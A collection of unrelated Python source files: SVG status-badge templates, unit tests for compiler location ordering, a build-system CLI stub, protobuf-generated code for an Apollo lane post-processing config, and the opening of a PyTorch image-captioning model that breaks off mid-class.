<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="86" height="20"><linearGradient id="b" x2="0" y2="100%"><stop offset="0" stop-color="#bbb" stop-opacity=".1"/><stop offset="1" stop-opacity=".1"/></linearGradient><clipPath id="a"><rect width="86" height="20" rx="3" fill="#fff"/></clipPath><g clip-path="url(#a)"><path fill="#555" d="M0 0h49v20H0z"/><path fill="#e05d44" d="M49 0h37v20H49z"/><path fill="url(#b)" d="M0 0h86v20H0z"/></g><g fill="#fff" text-anchor="middle" font-family="DejaVu Sans,Verdana,Geneva,sans-serif" font-size="110"> <text x="255" y="150" fill="#010101" fill-opacity=".3" transform="scale(.1)" textLength="390">service</text><text x="255" y="140" transform="scale(.1)" textLength="390">service</text><text x="665" y="150" fill="#010101" fill-opacity=".3" transform="scale(.1)" textLength="270">error</text><text x="665" y="140" transform="scale(.1)" textLength="270">error</text></g> </svg>
"""
SERVICE_UNKNOWN = """
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="110" height="20"><linearGradient id="b" x2="0" y2="100%"><stop offset="0" stop-color="#bbb" stop-opacity=".1"/><stop offset="1" stop-opacity=".1"/></linearGradient><clipPath id="a"><rect width="110" height="20" rx="3" fill="#fff"/></clipPath><g clip-path="url(#a)"><path fill="#555" d="M0 0h49v20H0z"/><path fill="#9f9f9f" d="M49 0h61v20H49z"/><path fill="url(#b)" d="M0 0h110v20H0z"/></g><g fill="#fff" text-anchor="middle" font-family="DejaVu Sans,Verdana,Geneva,sans-serif" font-size="110"> <text x="255" y="150" fill="#010101" fill-opacity=".3" transform="scale(.1)" textLength="390">service</text><text x="255" y="140" transform="scale(.1)" textLength="390">service</text><text x="785" y="150" fill="#010101" fill-opacity=".3" transform="scale(.1)" textLength="510">unknown</text><text x="785" y="140" transform="scale(.1)" textLength="510">unknown</text></g> </svg>
"""
PIPELINE_UNKNOWN = """
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="114" height="20"><linearGradient id="b" x2="0" y2="100%"><stop offset="0" stop-color="#bbb" stop-opacity=".1"/><stop offset="1" stop-opacity=".1"/></linearGradient><clipPath id="a"><rect width="114" height="20" rx="3" fill="#fff"/></clipPath><g clip-path="url(#a)"><path fill="#555" d="M0 0h53v20H0z"/><path fill="#9f9f9f" d="M53 0h61v20H53z"/><path fill="url(#b)" d="M0 0h114v20H0z"/></g><g fill="#fff" text-anchor="middle" font-family="DejaVu Sans,Verdana,Geneva,sans-serif" font-size="110"> <text x="275" y="150" fill="#010101" fill-opacity=".3" transform="scale(.1)" textLength="430">pipeline</text><text x="275" y="140" transform="scale(.1)" textLength="430">pipeline</text><text x="825" y="150" fill="#010101" fill-opacity=".3" transform="scale(.1)" textLength="510">unknown</text><text x="825" y="140" transform="scale(.1)" textLength="510">unknown</text></g> </svg>
"""
AVAILABILITY_TEMPLATE = """<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="132" height="20">
<linearGradient id="b" x2="0" y2="100%">
<stop offset="0" stop-color="#bbb" stop-opacity=".1"/>
<stop offset="1" stop-opacity=".1"/>
</linearGradient>
<clipPath id="a">
<rect width="132" height="20" rx="3" fill="#fff"/>
</clipPath>
<g clip-path="url(#a)">
<path fill="#555" d="M0 0h69v20H0z"/>
<path fill="{}" d="M69 0h63v20H69z"/>
<path fill="url(#b)" d="M0 0h132v20H0z"/>
</g>
<g fill="#fff" text-anchor="middle" font-family="DejaVu Sans,Verdana,Geneva,sans-serif" font-size="110">
<text x="355" y="150" fill="#010101" fill-opacity=".3" transform="scale(.1)" textLength="590">availability</text>
<text x="355" y="140" transform="scale(.1)" textLength="590">availability</text>
<text x="995" y="150" fill="#010101" fill-opacity=".3" transform="scale(.1)" textLength="530">{}</text>
<text x="995" y="140" transform="scale(.1)" textLength="530">{}</text>
</g>
</svg>"""
def make_availability_svg(color_name, availability):
text = 'unknown'
if availability:
text = "%0.05f" % availability
color = {
'lightgrey': '#9f9f9f',
'brightgreen': '#4c1',
'yellow': '#dfb317',
'red': '#e05d44'
}[color_name]
return AVAILABILITY_TEMPLATE.format(color, text, text)
|
# Copyright 2017-present Kensho Technologies, LLC.
from typing import List
import unittest
from ..compiler.helpers import BaseLocation, FoldScopeLocation, Location
def compare_sorted_locations_list(
test_case: unittest.TestCase, sorted_locations: List[BaseLocation]
) -> None:
"""Ensure that the given list of locations is in ascending order."""
for i, first_location in enumerate(sorted_locations):
for j, second_location in enumerate(sorted_locations):
expected_comparison = i < j
received_comparison = first_location < second_location
test_case.assertEqual(
expected_comparison,
received_comparison,
msg=(
"{} < {}, expected result {} but got {}".format(
first_location, second_location, expected_comparison, received_comparison
)
),
)
class LocationTests(unittest.TestCase):
def test_location_name(self) -> None:
base_location = Location(("Animal",))
self.assertEqual(("Animal___1", None), base_location.get_location_name())
base_at_field = base_location.navigate_to_field("name")
self.assertEqual(("Animal___1", "name"), base_at_field.get_location_name())
revisited_location = base_location.revisit()
self.assertEqual(("Animal___2", None), revisited_location.get_location_name())
revisited_at_field = revisited_location.navigate_to_field("name")
self.assertEqual(("Animal___2", "name"), revisited_at_field.get_location_name())
child_location = base_location.navigate_to_subpath("out_Animal_ParentOf")
self.assertEqual(
("Animal__out_Animal_ParentOf___1", None), child_location.get_location_name()
)
child_at_field = child_location.navigate_to_field("name")
self.assertEqual(
("Animal__out_Animal_ParentOf___1", "name"), child_at_field.get_location_name()
)
def test_location_comparisons(self) -> None:
sorted_locations = [
Location(("Animal", "in_Animal_Parent_of"), "uuid", 3),
Location(("Animal", "in_Animal_Parent_of", "in_Animal_FedAt"), "name", 2),
Location(("Animal", "in_Animal_Parent_of", "out_Animal_FedAt"), "name", 1),
Location(("Animal", "in_Animal_Parent_of", "out_Animal_FedAt"), None, 2),
Location(("Animal", "in_Animal_Parent_of", "out_Animal_FedAt"), "name", 2),
Location(("Animal", "in_Animal_Parent_of", "out_Animal_FedAt"), "uuid", 2),
]
for i, first_location in enumerate(sorted_locations):
for j, second_location in enumerate(sorted_locations):
expected_comparison = i < j
received_location_comparison = first_location < second_location
self.assertEqual(expected_comparison, received_location_comparison)
def test_fold_scope_location_comparisons(self) -> None:
sorted_locations = [
FoldScopeLocation(
Location(("Animal", "in_Animal_Parent_of")),
(
(
"in",
"Animal_OfSpecies",
),
),
None,
),
FoldScopeLocation(
Location(("Animal", "in_Animal_Parent_of")),
(
(
"out",
"Animal_OfSpecies",
),
),
None,
),
FoldScopeLocation(
Location(("Animal", "in_Animal_Parent_of")),
(
(
"out",
"Animal_OfSpecies",
),
("in", "out_Animal_FedAt"),
),
None,
),
FoldScopeLocation(
Location(("Animal", "in_Animal_Parent_of")),
(
(
"out",
"Animal_OfSpecies",
),
("in", "out_Animal_FedAt"),
),
"name",
),
FoldScopeLocation(
Location(("Animal", "in_Animal_Parent_of")),
(
(
"out",
"Animal_OfSpecies",
),
("in", "out_Animal_FedAt"),
),
"uuid",
),
]
for i, first_location in enumerate(sorted_locations):
for j, second_location in enumerate(sorted_locations):
expected_comparison = i < j
received_comparison = first_location < second_location
self.assertEqual(expected_comparison, received_comparison)
def test_mixed_location_comparisons(self) -> None:
sorted_locations = [
FoldScopeLocation(
Location(("Animal", "in_Animal_Parent_of")),
(
(
"in",
"Animal_OfSpecies",
),
),
None,
),
Location(("Animal", "in_Animal_Parent_of"), "name"),
FoldScopeLocation(
Location(("Animal", "out_Animal_Parent_of")),
(
(
"in",
"Animal_OfSpecies",
),
),
None,
),
]
compare_sorted_locations_list(self, sorted_locations)
|
__all__ = ['cli_setup_build_system']
import argparse
import colorama
from cli import *
from ext.utils.path import *
from file_structure import *
from .setup import *
def cli_setup_build_system():
# TODO : Fix description
arg_parser = argparse.ArgumentParser(description=f"Creates the '{colorama.Fore.LIGHTBLACK_EX}{BUILD_DIR_NAME}{colorama.Style.RESET_ALL}'"
'folder and setup specific build system builds inside.')
add_optional_path_arg(arg_parser, ROOT_DIR_ARG, path_arg_help="The project's root directory")
root_dir: TUnion_AnyPath = parse_optional_path_arg(arg_parser, ROOT_DIR_ARG)
arg_parser.parse_args()
def cli_cmd():
setup_build_system(root_dir=root_dir, cli_mode=True)
try_cmd_except_managed_errors(cli_cmd, arg_parser)
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: modules/perception/proto/lane_post_process_config.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='modules/perception/proto/lane_post_process_config.proto',
package='apollo.perception.lane_post_process_config',
syntax='proto2',
serialized_pb=_b('\n7modules/perception/proto/lane_post_process_config.proto\x12*apollo.perception.lane_post_process_config\"\xdc\r\n\x0cModelConfigs\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0f\n\x07version\x18\x02 \x01(\t\x12\x12\n\nspace_type\x18\x03 \x01(\t\x12\x13\n\x0bimage_width\x18\x04 \x01(\x05\x12\x14\n\x0cimage_height\x18\x05 \x01(\x05\x12\x0b\n\x03roi\x18\x06 \x03(\x02\x12\x14\n\x0cuse_non_mask\x18\x07 \x01(\x08\x12\x10\n\x08non_mask\x18\x08 \x03(\x02\x12(\n\x1alane_map_confidence_thresh\x18\t \x01(\x02:\x04\x30.95\x12\x18\n\x0c\x63\x63_split_siz\x18\n \x01(\x02:\x02\x35\x30\x12\x18\n\x0c\x63\x63_split_len\x18\x0b \x01(\x05:\x02\x32\x35\x12\x1c\n\x10min_cc_pixel_num\x18\x0c \x01(\x05:\x02\x31\x30\x12\x16\n\x0bmin_cc_size\x18\r \x01(\x05:\x01\x35\x12 \n\x13min_y_search_offset\x18\x0e \x01(\x02:\x03\x30.5\x12&\n\x19min_y_search_offset_image\x18\x0f \x01(\x02:\x03\x30.5\x12\x14\n\x0c\x61ssoc_method\x18\x10 \x01(\t\x12 \n\x12\x61ssoc_min_distance\x18\x11 \x01(\x02:\x04-0.5\x12$\n\x18\x61ssoc_min_distance_image\x18\x12 \x01(\x02:\x02-3\x12\x1e\n\x12\x61ssoc_max_distance\x18\x13 \x01(\x02:\x02\x36\x30\x12%\n\x18\x61ssoc_max_distance_image\x18\x14 \x01(\x02:\x03\x34\x30\x30\x12\"\n\x15\x61ssoc_distance_weight\x18\x15 \x01(\x02:\x03\x30.4\x12%\n\x19\x61ssoc_max_deviation_angle\x18\x16 \x01(\x02:\x02\x31\x35\x12+\n\x1f\x61ssoc_max_deviation_angle_image\x18\x17 \x01(\x02:\x02\x34\x35\x12)\n\x1c\x61ssoc_deviation_angle_weight\x18\x18 \x01(\x02:\x03\x30.2\x12\'\n\x1c\x61ssoc_max_departure_distance\x18\x19 \x01(\x02:\x01\x33\x12.\n\"assoc_max_departure_distance_image\x18\x1a \x01(\x02:\x02\x38\x30\x12,\n\x1f\x61ssoc_departure_distance_weight\x18\x1b \x01(\x02:\x03\x30.2\x12#\n\x17\x61ssoc_max_relative_orie\x18\x1c \x01(\x02:\x02\x31\x35\x12)\n\x1d\x61ssoc_max_relative_orie_image\x18\x1d \x01(\x02:\x02\x34\x35\x12\'\n\x1a\x61ssoc_relative_orie_weight\x18\x1e \x01(\x02:\x03\x30.2\x12\x30\n%assoc_min_orientation_estimation_size\x18\x1f \x01(\x02:\x01\x33\x12\x37\n+assoc_min_orientation_estimation_size_image\x18 \x01(\x02:\x02\x31\x30\x12\"\n\x17max_cc_marker_match_num\x18! \x01(\x05:\x01\x31\x12\x1d\n\x11slide_window_size\x18\" \x01(\x02:\x02\x31\x35\x12$\n\x17slide_window_size_image\x18# \x01(\x02:\x03\x32\x30\x30\x12%\n\x1aslide_window_max_point_num\x18$ \x01(\x05:\x01\x33\x12*\n\x1fmax_group_prediction_marker_num\x18% \x01(\x05:\x01\x33\x12\x31\n&orientation_estimation_skip_marker_num\x18& \x01(\x05:\x01\x31\x12!\n\x16lane_interval_distance\x18\' \x01(\x02:\x01\x34\x12(\n\x1dmin_instance_size_prefiltered\x18( \x01(\x02:\x01\x33\x12/\n#min_instance_size_prefiltered_image\x18) \x01(\x02:\x02\x32\x30\x12)\n\x1dmax_size_to_fit_straight_line\x18* \x01(\x02:\x02\x31\x30\x12\x30\n#max_size_to_fit_straight_line_image\x18+ \x01(\x02:\x03\x33\x30\x30\x12 \n\x12online_pitch_angle\x18, \x01(\x02:\x04-2.5\x12\x1a\n\rground_height\x18- \x01(\x02:\x03\x31.6\x12\x30\n#max_distance_to_see_for_transformer\x18. \x01(\x02:\x03\x35\x30\x30\x12\x19\n\x0elane_map_scale\x18/ \x01(\x02:\x01\x32\x12\x18\n\x0bstart_y_pos\x18\x30 \x01(\x05:\x03\x33\x31\x32\x12\x1b\n\x0elane_map_width\x18\x31 \x01(\x05:\x03\x39\x36\x30\x12\x1c\n\x0flane_map_height\x18\x32 \x01(\x05:\x03\x33\x38\x34')
)
_MODELCONFIGS = _descriptor.Descriptor(
name='ModelConfigs',
full_name='apollo.perception.lane_post_process_config.ModelConfigs',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='apollo.perception.lane_post_process_config.ModelConfigs.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='version', full_name='apollo.perception.lane_post_process_config.ModelConfigs.version', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='space_type', full_name='apollo.perception.lane_post_process_config.ModelConfigs.space_type', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='image_width', full_name='apollo.perception.lane_post_process_config.ModelConfigs.image_width', index=3,
number=4, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='image_height', full_name='apollo.perception.lane_post_process_config.ModelConfigs.image_height', index=4,
number=5, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='roi', full_name='apollo.perception.lane_post_process_config.ModelConfigs.roi', index=5,
number=6, type=2, cpp_type=6, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='use_non_mask', full_name='apollo.perception.lane_post_process_config.ModelConfigs.use_non_mask', index=6,
number=7, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='non_mask', full_name='apollo.perception.lane_post_process_config.ModelConfigs.non_mask', index=7,
number=8, type=2, cpp_type=6, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='lane_map_confidence_thresh', full_name='apollo.perception.lane_post_process_config.ModelConfigs.lane_map_confidence_thresh', index=8,
number=9, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(0.95),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='cc_split_siz', full_name='apollo.perception.lane_post_process_config.ModelConfigs.cc_split_siz', index=9,
number=10, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(50),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='cc_split_len', full_name='apollo.perception.lane_post_process_config.ModelConfigs.cc_split_len', index=10,
number=11, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=25,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='min_cc_pixel_num', full_name='apollo.perception.lane_post_process_config.ModelConfigs.min_cc_pixel_num', index=11,
number=12, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=10,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='min_cc_size', full_name='apollo.perception.lane_post_process_config.ModelConfigs.min_cc_size', index=12,
number=13, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=5,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='min_y_search_offset', full_name='apollo.perception.lane_post_process_config.ModelConfigs.min_y_search_offset', index=13,
number=14, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(0.5),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='min_y_search_offset_image', full_name='apollo.perception.lane_post_process_config.ModelConfigs.min_y_search_offset_image', index=14,
number=15, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(0.5),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='assoc_method', full_name='apollo.perception.lane_post_process_config.ModelConfigs.assoc_method', index=15,
number=16, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='assoc_min_distance', full_name='apollo.perception.lane_post_process_config.ModelConfigs.assoc_min_distance', index=16,
number=17, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(-0.5),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='assoc_min_distance_image', full_name='apollo.perception.lane_post_process_config.ModelConfigs.assoc_min_distance_image', index=17,
number=18, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(-3),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='assoc_max_distance', full_name='apollo.perception.lane_post_process_config.ModelConfigs.assoc_max_distance', index=18,
number=19, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(60),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='assoc_max_distance_image', full_name='apollo.perception.lane_post_process_config.ModelConfigs.assoc_max_distance_image', index=19,
number=20, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(400),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='assoc_distance_weight', full_name='apollo.perception.lane_post_process_config.ModelConfigs.assoc_distance_weight', index=20,
number=21, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(0.4),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='assoc_max_deviation_angle', full_name='apollo.perception.lane_post_process_config.ModelConfigs.assoc_max_deviation_angle', index=21,
number=22, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(15),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='assoc_max_deviation_angle_image', full_name='apollo.perception.lane_post_process_config.ModelConfigs.assoc_max_deviation_angle_image', index=22,
number=23, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(45),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='assoc_deviation_angle_weight', full_name='apollo.perception.lane_post_process_config.ModelConfigs.assoc_deviation_angle_weight', index=23,
number=24, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(0.2),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='assoc_max_departure_distance', full_name='apollo.perception.lane_post_process_config.ModelConfigs.assoc_max_departure_distance', index=24,
number=25, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(3),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='assoc_max_departure_distance_image', full_name='apollo.perception.lane_post_process_config.ModelConfigs.assoc_max_departure_distance_image', index=25,
number=26, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(80),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='assoc_departure_distance_weight', full_name='apollo.perception.lane_post_process_config.ModelConfigs.assoc_departure_distance_weight', index=26,
number=27, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(0.2),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='assoc_max_relative_orie', full_name='apollo.perception.lane_post_process_config.ModelConfigs.assoc_max_relative_orie', index=27,
number=28, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(15),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='assoc_max_relative_orie_image', full_name='apollo.perception.lane_post_process_config.ModelConfigs.assoc_max_relative_orie_image', index=28,
number=29, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(45),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='assoc_relative_orie_weight', full_name='apollo.perception.lane_post_process_config.ModelConfigs.assoc_relative_orie_weight', index=29,
number=30, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(0.2),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='assoc_min_orientation_estimation_size', full_name='apollo.perception.lane_post_process_config.ModelConfigs.assoc_min_orientation_estimation_size', index=30,
number=31, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(3),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='assoc_min_orientation_estimation_size_image', full_name='apollo.perception.lane_post_process_config.ModelConfigs.assoc_min_orientation_estimation_size_image', index=31,
number=32, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(10),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='max_cc_marker_match_num', full_name='apollo.perception.lane_post_process_config.ModelConfigs.max_cc_marker_match_num', index=32,
number=33, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=1,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='slide_window_size', full_name='apollo.perception.lane_post_process_config.ModelConfigs.slide_window_size', index=33,
number=34, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(15),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='slide_window_size_image', full_name='apollo.perception.lane_post_process_config.ModelConfigs.slide_window_size_image', index=34,
number=35, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(200),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='slide_window_max_point_num', full_name='apollo.perception.lane_post_process_config.ModelConfigs.slide_window_max_point_num', index=35,
number=36, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=3,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='max_group_prediction_marker_num', full_name='apollo.perception.lane_post_process_config.ModelConfigs.max_group_prediction_marker_num', index=36,
number=37, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=3,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='orientation_estimation_skip_marker_num', full_name='apollo.perception.lane_post_process_config.ModelConfigs.orientation_estimation_skip_marker_num', index=37,
number=38, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=1,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='lane_interval_distance', full_name='apollo.perception.lane_post_process_config.ModelConfigs.lane_interval_distance', index=38,
number=39, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(4),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='min_instance_size_prefiltered', full_name='apollo.perception.lane_post_process_config.ModelConfigs.min_instance_size_prefiltered', index=39,
number=40, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(3),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='min_instance_size_prefiltered_image', full_name='apollo.perception.lane_post_process_config.ModelConfigs.min_instance_size_prefiltered_image', index=40,
number=41, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(20),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='max_size_to_fit_straight_line', full_name='apollo.perception.lane_post_process_config.ModelConfigs.max_size_to_fit_straight_line', index=41,
number=42, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(10),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='max_size_to_fit_straight_line_image', full_name='apollo.perception.lane_post_process_config.ModelConfigs.max_size_to_fit_straight_line_image', index=42,
number=43, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(300),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='online_pitch_angle', full_name='apollo.perception.lane_post_process_config.ModelConfigs.online_pitch_angle', index=43,
number=44, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(-2.5),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='ground_height', full_name='apollo.perception.lane_post_process_config.ModelConfigs.ground_height', index=44,
number=45, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(1.6),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='max_distance_to_see_for_transformer', full_name='apollo.perception.lane_post_process_config.ModelConfigs.max_distance_to_see_for_transformer', index=45,
number=46, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(500),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='lane_map_scale', full_name='apollo.perception.lane_post_process_config.ModelConfigs.lane_map_scale', index=46,
number=47, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(2),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='start_y_pos', full_name='apollo.perception.lane_post_process_config.ModelConfigs.start_y_pos', index=47,
number=48, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=312,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='lane_map_width', full_name='apollo.perception.lane_post_process_config.ModelConfigs.lane_map_width', index=48,
number=49, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=960,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='lane_map_height', full_name='apollo.perception.lane_post_process_config.ModelConfigs.lane_map_height', index=49,
number=50, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=384,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=104,
serialized_end=1860,
)
DESCRIPTOR.message_types_by_name['ModelConfigs'] = _MODELCONFIGS
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
ModelConfigs = _reflection.GeneratedProtocolMessageType('ModelConfigs', (_message.Message,), dict(
DESCRIPTOR = _MODELCONFIGS,
__module__ = 'modules.perception.proto.lane_post_process_config_pb2'
# @@protoc_insertion_point(class_scope:apollo.perception.lane_post_process_config.ModelConfigs)
))
_sym_db.RegisterMessage(ModelConfigs)
# @@protoc_insertion_point(module_scope)
|
import torch
import torch.nn as nn
import torchvision.models as models
import torch.nn.functional as F
class EncoderCNN(nn.Module):
def __init__(self, embed_size):
super(EncoderCNN, self).__init__()
resnet = models.resnet50(pretrained=True)
for param in resnet.parameters():
param.requires_grad_(False)
modules = list(resnet.children())[:-1]
self.resnet = nn.Sequential(*modules)
self.embed = nn.Linear(resnet.fc.in_features, embed_size)
def forward(self, images):
features = self.resnet(images)
features = features.view(features.size(0), -1)
features = self.embed(features)
return features
class DecoderRNN(nn.Module):
def __init__(self, embed_size, hidden_size, vocab_size, num_layers=2):
super().__init__()
self.embed_size = embed_size
self.hidden_size = hidden_size
